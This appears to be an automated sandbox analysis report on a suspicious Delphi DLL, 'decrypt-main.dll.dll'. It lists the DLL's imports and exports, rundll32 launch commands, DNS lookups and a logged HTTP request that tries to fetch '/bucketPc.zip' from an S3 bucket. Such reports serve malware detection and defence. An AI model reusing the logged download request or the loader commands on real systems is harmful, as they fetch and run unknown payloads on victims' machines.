                  RT_RCDATA0x521cec0x2291Delphi compiled form 'TFReceber'0.15323765397220024
                  RT_RCDATA0x523f800xb75Delphi compiled form 'TF_Abundant'0.4302761677463348
                  RT_RCDATA0x524af80xcc9Delphi compiled form 'TF_FlatLandPianoMovers'0.43568591506263366
                  RT_RCDATA0x5257c40x494Delphi compiled form 'TLoginDialog'0.48976109215017066
                  RT_RCDATA0x525c580x3c4Delphi compiled form 'TPasswordDialog'0.4678423236514523
                  RT_GROUP_CURSOR0x52601c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                  RT_GROUP_CURSOR0x5260300x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                  RT_GROUP_CURSOR0x5260440x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                  RT_GROUP_CURSOR0x5260580x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                  RT_GROUP_CURSOR0x52606c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                  RT_GROUP_CURSOR0x5260800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                  RT_GROUP_CURSOR0x5260940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                  RT_VERSION0x5260a80x218dataEnglishUnited States0.48134328358208955
                  DLLImport
                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                  advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                  user32.dllCharNextW, LoadStringW
                  kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
                  kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc, FreeLibrary
                  user32.dllSetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCaretPos, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MoveWindow, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, IsCharAlphaNumericW, IsCharAlphaW, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageExtraInfo, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
                  gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyPolyline, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStretchBltMode, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetNearestColor, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreatePen, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
                  version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                  kernel32.dlllstrcmpW, WriteFile, WinExec, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, TerminateProcess, SystemTimeToFileTime, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OpenProcess, MulDiv, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVolumeInformationW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileMappingW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
                  advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                  kernel32.dllSleep
                  netapi32.dllNetApiBufferFree, NetWkstaGetInfo
                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                  oleaut32.dllGetErrorInfo, SysFreeString
                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                  comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                  user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                  msvcrt.dllmemset, memcpy
                  shell32.dllShellExecuteExW, ShellExecuteW, Shell_NotifyIconW
                  URLMON.DLLURLDownloadToFileW
                  shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW
                  winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                  winspool.drvGetDefaultPrinterW
                  kernel32.dllMulDiv
                  NameOrdinalAddress
                  HackCheck50x816700
                  ServiceCrtMain40x816700
                  TMethodImplementationIntercept30x498cf0
                  __dbk_fcall_wrapper20x419ae0
                  dbkFCallWrapperAddr10x88e290
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 13, 2024 17:01:21.588476896 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:21.588501930 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:21.588551998 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:21.602117062 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:21.602127075 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:22.214008093 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:22.214097023 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:22.338424921 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:22.338453054 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:22.338777065 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:22.338825941 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:22.356600046 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:22.404232979 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:22.562319040 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:22.562382936 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:22.562407017 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:22.562437057 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:22.562485933 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:22.575414896 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:22.575432062 CET4434972352.95.163.36192.168.2.6
                  Mar 13, 2024 17:01:22.575443029 CET49723443192.168.2.652.95.163.36
                  Mar 13, 2024 17:01:22.575481892 CET49723443192.168.2.652.95.163.36
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 13, 2024 17:01:21.449564934 CET5055653192.168.2.61.1.1.1
                  Mar 13, 2024 17:01:21.575541019 CET53505561.1.1.1192.168.2.6
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 13, 2024 17:01:21.449564934 CET192.168.2.61.1.1.10xc3fcStandard query (0)bucreate203920233.s3.sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 13, 2024 17:01:21.575541019 CET1.1.1.1192.168.2.60xc3fcNo error (0)bucreate203920233.s3.sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                  Mar 13, 2024 17:01:21.575541019 CET1.1.1.1192.168.2.60xc3fcNo error (0)s3-r-w.sa-east-1.amazonaws.com52.95.163.36A (IP address)IN (0x0001)false
                  Mar 13, 2024 17:01:21.575541019 CET1.1.1.1192.168.2.60xc3fcNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.50A (IP address)IN (0x0001)false
                  Mar 13, 2024 17:01:21.575541019 CET1.1.1.1192.168.2.60xc3fcNo error (0)s3-r-w.sa-east-1.amazonaws.com52.95.165.122A (IP address)IN (0x0001)false
                  Mar 13, 2024 17:01:21.575541019 CET1.1.1.1192.168.2.60xc3fcNo error (0)s3-r-w.sa-east-1.amazonaws.com52.95.165.11A (IP address)IN (0x0001)false
                  Mar 13, 2024 17:01:21.575541019 CET1.1.1.1192.168.2.60xc3fcNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.54A (IP address)IN (0x0001)false
                  Mar 13, 2024 17:01:21.575541019 CET1.1.1.1192.168.2.60xc3fcNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.54A (IP address)IN (0x0001)false
                  Mar 13, 2024 17:01:21.575541019 CET1.1.1.1192.168.2.60xc3fcNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.50A (IP address)IN (0x0001)false
                  Mar 13, 2024 17:01:21.575541019 CET1.1.1.1192.168.2.60xc3fcNo error (0)s3-r-w.sa-east-1.amazonaws.com52.95.164.27A (IP address)IN (0x0001)false
                  • bucreate203920233.s3.sa-east-1.amazonaws.com
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.64972352.95.163.364431756C:\Windows\System32\rundll32.exe
                  TimestampBytes transferredDirectionData
                  2024-03-13 16:01:22 UTC336OUTGET /bucketPc.zip HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: bucreate203920233.s3.sa-east-1.amazonaws.com
                  Connection: Keep-Alive
                  2024-03-13 16:01:22 UTC285INHTTP/1.1 404 Not Found
                  x-amz-request-id: KGMPNF9Q2A4G276A
                  x-amz-id-2: oUwOBGcXcRaJOfg9RDvUMM390Opwe1X0G+WIoo1w9G6BKuiw2Othw5sAOuPb4cT9/PXSnCglEcE=
                  Content-Type: application/xml
                  Transfer-Encoding: chunked
                  Date: Wed, 13 Mar 2024 16:01:21 GMT
                  Server: AmazonS3
                  Connection: close
                  2024-03-13 16:01:22 UTC319INData Raw: 31 33 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 62 75 63 6b 65 74 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 3c 2f 4d 65 73 73 61 67 65 3e 3c 42 75 63 6b 65 74 4e 61 6d 65 3e 62 75 63 72 65 61 74 65 32 30 33 39 32 30 32 33 33 3c 2f 42 75 63 6b 65 74 4e 61 6d 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 4b 47 4d 50 4e 46 39 51 32 41 34 47 32 37 36 41 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 6f 55 77 4f 42 47 63 58 63 52 61 4a 4f 66 67 39 52 44 76 55 4d 4d 33 39 30 4f 70 77 65 31 58 30 47 2b 57 49
                  Data Ascii: 133<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>bucreate203920233</BucketName><RequestId>KGMPNF9Q2A4G276A</RequestId><HostId>oUwOBGcXcRaJOfg9RDvUMM390Opwe1X0G+WI


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:1
                  Start time:17:01:18
                  Start date:13/03/2024
                  Path:C:\Windows\System32\loaddll64.exe
                  Wow64 process (32bit):false
                  Commandline:loaddll64.exe "C:\Users\user\Desktop\decrypt-main.dll.dll"
                  Imagebase:0x7ff7768a0000
                  File size:165'888 bytes
                  MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:moderate
                  Has exited:true

                  Target ID:2
                  Start time:17:01:18
                  Start date:13/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:17:01:18
                  Start date:13/03/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
                  Imagebase:0x7ff7d1d90000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:17:01:18
                  Start date:13/03/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck
                  Imagebase:0x7ff7b8b10000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:17:01:18
                  Start date:13/03/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
                  Imagebase:0x7ff7b8b10000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:17:01:19
                  Start date:13/03/2024
                  Path:C:\Windows\System32\WerFault.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\WerFault.exe -u -p 948 -s 484
                  Imagebase:0x7ff774430000
                  File size:570'736 bytes
                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:13
                  Start time:17:01:21
                  Start date:13/03/2024
                  Path:C:\Windows\System32\WerFault.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\WerFault.exe -u -p 1756 -s 2000
                  Imagebase:0x7ff774430000
                  File size:570'736 bytes
                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:14
                  Start time:17:01:21
                  Start date:13/03/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMain
                  Imagebase:0x7ff7b8b10000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:false

                  Target ID:15
                  Start time:17:01:24
                  Start date:13/03/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationIntercept
                  Imagebase:0x7ff7b8b10000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  Target ID:17
                  Start time:17:01:25
                  Start date:13/03/2024
                  Path:C:\Windows\System32\WerFault.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\WerFault.exe -u -p 4072 -s 468
                  Imagebase:0x7ff774430000
                  File size:570'736 bytes
                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:18
                  Start time:17:01:27
                  Start date:13/03/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheck
                  Imagebase:0x7ff7b8b10000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:false

                  Target ID:19
                  Start time:17:01:27
                  Start date:13/03/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMain
                  Imagebase:0x7ff7b8b10000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:false

                  Target ID:20
                  Start time:17:01:27
                  Start date:13/03/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationIntercept
                  Imagebase:0x7ff7b8b10000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  Target ID:21
                  Start time:17:01:27
                  Start date:13/03/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddr
                  Imagebase:0x7ff7b8b10000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Has exited:true

                  Target ID:23
                  Start time:17:01:28
                  Start date:13/03/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapper
                  Imagebase:0x7ff7b8b10000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Has exited:true

                  Target ID:25
                  Start time:17:01:28
                  Start date:13/03/2024
                  Path:C:\Windows\System32\WerFault.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7028 -s 468
                  Imagebase:0x7ff774430000
                  File size:570'736 bytes
                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:9.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:1.8%
                    Total number of Nodes:1709
                    Total number of Limit Nodes:4
                    execution_graph 6472 40edf0 6473 40ee08 6472->6473 6474 40eef6 _purecall 6473->6474 6475 815f10 6495 80c650 6475->6495 6479 815f64 6515 4111e0 6479->6515 6481 815f79 6482 81602c GetMessageW 6481->6482 6519 436960 6481->6519 6484 816041 6482->6484 6485 816018 6482->6485 6543 40fec0 6484->6543 6485->6482 6486 815faa 6488 815fba Sleep 6486->6488 6490 436960 4 API calls 6488->6490 6491 815fd3 6490->6491 6491->6482 6527 80fc70 6491->6527 6547 40fde0 6495->6547 6497 80c667 6498 80c6ae 6497->6498 6551 411240 6497->6551 6500 4114b0 6498->6500 6501 4114e9 6500->6501 6502 4114cf 6500->6502 6501->6479 6503 4114eb 6502->6503 6504 4114dc 6502->6504 6506 411507 6503->6506 6507 40c4c0 TlsGetValue 6503->6507 6589 410430 6504->6589 6595 4106d0 6506->6595 6507->6506 6511 411538 6514 4106d0 TlsGetValue 6511->6514 6512 411521 6512->6511 6513 4106d0 TlsGetValue 6512->6513 6513->6511 6514->6501 6516 4111f4 6515->6516 6517 4100a0 TlsGetValue 6516->6517 6518 411202 6517->6518 6518->6481 6626 411140 6519->6626 6521 436973 GetFileAttributesW 6522 436989 6521->6522 6523 436a4e GetLastError 6521->6523 6524 4369a6 CreateFileW 6522->6524 6526 436993 6522->6526 6523->6526 6525 4369e1 CloseHandle 6524->6525 6524->6526 6525->6526 6526->6486 6528 80fc91 6527->6528 6628 80c6c0 6528->6628 6531 40fde0 TlsGetValue 6532 80fcd5 6531->6532 6533 815b40 6532->6533 6534 815b5e 6533->6534 6535 815b70 Sleep 6534->6535 6536 815b85 6535->6536 6537 410430 TlsGetValue 6536->6537 6538 815bc4 6537->6538 6868 80f6d0 6538->6868 6541 40fec0 TlsGetValue 6542 815c03 6541->6542 6542->6485 6544 40fee2 6543->6544 6545 40fecf 6543->6545 6545->6544 6546 40fde0 TlsGetValue 6545->6546 6546->6545 6548 40fdf0 6547->6548 6549 40fe19 6547->6549 6548->6549 6555 409120 6548->6555 6549->6497 6552 41124f 6551->6552 6570 4100a0 6552->6570 6556 40912a 6555->6556 6557 40912e 6555->6557 6556->6549 6557->6556 6559 4093f0 6557->6559 6562 409390 6559->6562 6561 409401 6561->6556 6563 4093a8 6562->6563 6565 4093bc 6563->6565 6566 419650 6563->6566 6565->6561 6567 419682 6566->6567 6568 41965d 6566->6568 6567->6565 6568->6567 6569 419672 TlsGetValue 6568->6569 6569->6567 6571 4100bf 6570->6571 6573 4100c6 6570->6573 6576 40fcb0 6571->6576 6574 40fde0 TlsGetValue 6573->6574 6575 4100f4 